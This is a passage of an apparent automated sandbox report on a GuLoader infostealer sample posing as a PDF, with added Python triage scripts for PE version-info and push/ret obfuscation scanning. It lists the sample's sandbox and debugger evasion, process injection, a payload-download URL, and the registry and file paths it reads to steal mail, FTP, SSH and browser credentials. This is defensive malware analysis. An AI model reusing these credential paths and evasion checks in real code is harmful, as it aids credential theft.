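    if w_type != 1:                              # 1 = text value, 0 = binary
        return None
    if w_value_length == 0:
        return ""
    p = pos + len(KEY)
    if data[p:p + 2] == b"\x00\x00":             # alignment padding before the value
        p += 2
    raw = data[p:p + 2 * w_value_length]
    return raw.decode("utf-16-le", errors="replace").rstrip("\x00")


def original_filename_mismatch(data, on_disk_name):
    """True if the embedded OriginalFilename differs from the on-disk name (case-insensitive),
    False if they match, None if no version information was found."""
    embedded = read_original_filename(data)
    if embedded is None:
        return None
    return embedded.lower() != on_disk_name.lower()


if __name__ == "__main__":
    print(read_original_filename(SAMPLE_BLOB),
          original_filename_mismatch(SAMPLE_BLOB, "RFQ 001030112021#U00b7pdf.exe"))
```

The search by key works on memory dumps as well as files, which is why the report finds the string in both the 0041C000 image region and the 02960000 heap region; a mismatch is a triage signal, not proof of malice, since legitimately renamed installers produce it too.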
PE file contains strange resources
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
PE / OLE file has an invalid certificate
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: invalid certificate
Source: RFQ 001030112021#U00b7pdf.exe Metadefender: Detection: 17%
Source: RFQ 001030112021#U00b7pdf.exe ReversingLabs: Detection: 17%
Source: RFQ 001030112021#U00b7pdf.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File read: C:\Windows\System32\drivers\etc\hosts (3 occurrences)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.770638438.00000000020B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.770261395.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040264C push 0040130Eh; ret 0_2_0040265F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402660 push 0040130Eh; ret 0_2_00402673
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402674 push 0040130Eh; ret 0_2_00402687
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040260D push 0040130Eh; ret 0_2_00402623
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00408E1D push 0000000Eh; ret 0_2_00408E20
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402624 push 0040130Eh; ret 0_2_00402637
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402638 push 0040130Eh; ret 0_2_0040264B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026C4 push 0040130Eh; ret 0_2_004026D7
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026D8 push 0040130Eh; ret 0_2_004026EB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026EC push 0040130Eh; ret 0_2_004026FF
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402688 push 0040130Eh; ret 0_2_0040269B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040269C push 0040130Eh; ret 0_2_004026AF
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004076A2 push 0000004Bh; ret 0_2_004076A8
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004026B0 push 0040130Eh; ret 0_2_004026C3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402750 push 0040130Eh; ret 0_2_00402763
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402764 push 0040130Eh; ret 0_2_00402777
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402778 push 0040130Eh; ret 0_2_0040278B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00408B7E push esp; iretd 0_2_00408B7F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402700 push 0040130Eh; ret 0_2_00402713
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402714 push 0040130Eh; ret 0_2_00402727
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_00402728 push 0040130Eh; ret 0_2_0040273B
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040273C push 0040130Eh; ret 0_2_0040274F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004061E0 push eax; retf 0_2_0040624D
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_0040278C push 0040130Eh; ret 0_2_0040279F
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_004027A0 push 0040130Eh; ret 0_2_004027B3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9405 pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B51F2 push ecx; retn 0010h 0_2_020B51A3
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9629 pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9635 pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B964D pushad ; retn A0FEh 0_2_020B9941
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B9641 pushad ; retn A0FEh 0_2_020B9941
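Each `push <imm>; ret` pair listed above is an indirect jump: the pushed value becomes the return address, so control reaches 0040130Eh without a `jmp` or `call` that a disassembler would follow, and the `pushad; retn A0FEh` and `push esp; iretd` forms do the same with a register or flags value. The scanner below is an added example, not the sandbox's own detection logic: it finds such pairs in a byte buffer by pattern alone, decodes the pushed target and counts how many gadgets lead to the same address, which is what makes one target hit by a dozen code paths stand out. The bytes it scans are constructed to mirror the gadgets in the listing, not bytes taken from the sample. Because it slides over every offset without a real disassembler, a hit can land inside a longer instruction and should be confirmed in a disassembler before it is reported.

```python
import struct

# Constructed bytes modelled on the gadgets the report lists; not bytes taken from the sample.
SAMPLE_CODE = bytes.fromhex(
    "55 8B EC"             # push ebp; mov ebp, esp  (ordinary prologue: no hit)
    "68 0E 13 40 00 C3"    # push 0040130Eh; ret     (as at 0_2_0040264C)
    "90"                   # nop
    "68 0E 13 40 00 C3"    # push 0040130Eh; ret     (as at 0_2_00402660)
    "6A 0E C3"             # push 0000000Eh; ret     (as at 0_2_00408E1D)
    "54 CF"                # push esp; iretd         (as at 0_2_00408B7E)
    "60 C2 FE A0"          # pushad; retn A0FEh      (as at 0_2_020B9405)
    "50 CB"                # push eax; retf          (as at 0_2_004061E0)
    "C3"                   # bare ret with no push before it: no hit
)

REGS32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET_OPCODES = {0xC3: "ret", 0xC2: "retn", 0xCB: "retf", 0xCA: "retf", 0xCF: "iretd"}
RET_WITH_IMM16 = {0xC2, 0xCA}


def decode_push(code, i):
    """Decode a push at offset i: (length, text, pushed value or None), or None if not a push."""
    op = code[i]
    if op == 0x68 and i + 5 <= len(code):                    # push imm32
        value = struct.unpack_from("<I", code, i + 1)[0]
        return 5, f"push {value:08X}h", value
    if op == 0x6A and i + 2 <= len(code):                    # push imm8, sign-extended to 32 bits
        value = struct.unpack_from("<b", code, i + 1)[0] & 0xFFFFFFFF
        return 2, f"push {value:08X}h", value
    if 0x50 <= op <= 0x57:                                   # push r32
        return 1, f"push {REGS32[op - 0x50]}", None
    if op == 0x60:                                           # pushad
        return 1, "pushad", None
    return None


def decode_ret(code, i):
    """Decode a ret/retn/retf/iretd at offset i: (length, text), or None."""
    if i >= len(code) or code[i] not in RET_OPCODES:
        return None
    op = code[i]
    if op in RET_WITH_IMM16:
        if i + 3 > len(code):
            return None
        imm = struct.unpack_from("<H", code, i + 1)[0]
        return 3, f"{RET_OPCODES[op]} {imm:X}h"
    return 1, RET_OPCODES[op]


def find_push_ret_gadgets(code, base=0):
    """Slide over every byte offset and report each push immediately followed by a return.
    The pushed immediate, when there is one, is the address the return will jump to."""
    hits = []
    for i in range(len(code)):
        push = decode_push(code, i)
        if push is None:
            continue
        plen, ptext, value = push
        ret = decode_ret(code, i + plen)
        if ret is None:
            continue
        rlen, rtext = ret
        hits.append({"offset": base + i, "end": base + i + plen + rlen,
                     "text": f"{ptext}; {rtext}", "target": value})
    return hits


def targets_by_count(hits):
    """Count how many gadgets redirect to each pushed address; one address reached by many
    push/ret pairs (0040130Eh in the listing) is the pattern worth following up."""
    counts = {}
    for h in hits:
        if h["target"] is not None:
            counts[h["target"]] = counts.get(h["target"], 0) + 1
    return counts


if __name__ == "__main__":
    for h in find_push_ret_gadgets(SAMPLE_CODE, base=0x00402600):
        print(f"{h['offset']:08X} {h['text']}")
    print(targets_by_count(find_push_ret_gadgets(SAMPLE_CODE)))
```

Point it at the `.text` section of the unpacked file (or a memory dump of the 020B0000 region) with `base` set to that section's virtual address and the offsets line up with the report's `0_2_` addresses.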
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process information set: NOGPFAULTERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1F5UP5O0CFHZV_GAVQKAQAHPOSXGGLGCB
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 2832 Thread sleep count: 678 > 30
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe TID: 4564 Thread sleep time: -60000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Last function: Thread delayed
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Window / User API: threadDelayed 678
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Thread delayed: delay time: 60000
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe System information queried: ModuleInformation
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWV
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895453741.000000001E6F8000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.895483253.000000001E728000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892121972.0000000000987000.00000004.00000020.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892164333.00000000009D7000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770672587.00000000028C0000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: RFQ 001030112021#U00b7pdf.exe, 00000000.00000002.770756711.0000000002B6A000.00000004.00000001.sdmp, RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892290801.000000000262A000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat
Source: RFQ 001030112021#U00b7pdf.exe, 00000008.00000002.892261911.0000000002420000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://drive.google.com/uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb

Anti Debugging:

Hides threads from debuggers
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Thread information set: HideFromDebugger
Enables debug privileges
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process token adjusted: Debug
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BC7BF mov eax, dword ptr fs:[00000030h] 0_2_020BC7BF
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BBAA1 mov eax, dword ptr fs:[00000030h] 0_2_020BBAA1
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BDB82 mov eax, dword ptr fs:[00000030h] 0_2_020BDB82
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BD872 mov eax, dword ptr fs:[00000030h] 0_2_020BD872
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020B8F54 mov eax, dword ptr fs:[00000030h] 0_2_020B8F54
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Code function: 0_2_020BA6B9 LdrInitializeThunk, 0_2_020BA6B9

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Process created: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe "C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe"
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data